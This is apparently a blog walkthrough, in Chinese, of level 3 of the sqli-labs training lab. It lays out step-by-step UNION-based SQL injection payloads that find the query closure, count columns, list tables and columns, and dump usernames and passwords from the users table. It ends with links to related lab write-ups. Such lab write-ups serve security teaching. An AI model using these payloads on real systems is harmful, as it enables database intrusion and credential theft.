sqli-labs---第三关

简介: sqli-labs---第三关

1、判断什么类型注入


?id=1 正常显示


?id=1' (报错:''1'') LIMIT 0,1')


?id=1'' 正常显示


?id=1'#(报错:''1'') LIMIT 0,1')


可知闭合方式为')


2、查看列数


?id=1') order by 3 --+ (没有报错)


?id=1') order by 4 --+ (报错)


说明有3列

3、使用联合查询查看回显位置(前面为错可以执行后面的)

?id=-1') union select 1,2,3 --+

回显在2,3,列

4、查询数据库名(security)

?id=-1') union select 1,database(),3 --+

5、查询表名(一共爆出四张表,查看敏感表users)


?id=-1') union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema=database();--+

6、查询users表中字段名(查看到了敏感字段id,username,password)

?id=-1') union select 1,database(),group_concat(column_name) from information_schema.columns where table_name='users';--+

7、查看字段username和password的信息

 ?id=-1') union select 1,database(),group_concat(username,password) from security.users;--+

为了方便分清楚username和密码,可以用id将信息隔开

  ?id=-1') union select 1,database(),group_concat(username,id,password) from security.users;--+

相关文章
|
5月前
|
安全 数据库 数据安全/隐私保护
sqli-labs第一关
sqli-labs第一关
|
SQL 数据库
SQLi LABS Less-26a
第26a关使用GET请求传递参数,在url地址栏中构造payload即可 源码中过滤了参数中的or,and,/*,--,#,空格,斜线,我们想办法绕过即可
309 0
SQLi LABS Less-26a
|
SQL 数据库 数据安全/隐私保护
SQLi LABS Less-21
21关使用POST请求提交参数,对用户名和密码中的特殊字符进行了转译,难度较大
156 0
SQLi LABS Less-21
SQLi LABS Less-29
第29关使用GET请求提交参数,在url中构造payload即可 源码中并没有做什么过滤,直接测试注入点即可
208 0
SQLi LABS Less-29
SQLi LABS Less-30
第30关使用GET请求传递参数,在url中构造payload即可 后端源码中并没有做什么过滤,只是在参数两边添加了双引号
134 0
SQLi LABS Less-30
SQLi LABS Less-26
第26关使用GET请求提交参数,我们可以直接在url地址栏中构造payload 源码中过滤了or,and,/*,#,--,空格,斜线,需要想办法绕过
254 0
SQLi LABS Less-26
|
SQL 数据库 数据安全/隐私保护
SQLi LABS Less-22
2关使用POST请求提交参数,对账号和密码中的特殊字符执行了转译的操作,难度较大
104 0
SQLi LABS Less-22
SQLi LABS Less-25a
第25a关使用GET请求传递参数,在url地址栏中构造payload即可 后端源码中过滤了and和or,但只过滤了一次,我们可以通过双写绕过
211 0
SQLi LABS Less-25a
|
SQL 安全 数据库
SQLi LABS Less-17
第十七关请求方式为POST请求 , 注入点为 单引号字符型注入 , 注入方式为 报错注入 第一步,判断注入类型
159 0
SQLi LABS Less-17
|
SQL 存储 安全
SQLi LABS Less-39
第三十九关请求方式为GET请求 , 注入类型为 整形注入 第一步,判断注入类型
105 0
SQLi LABS Less-39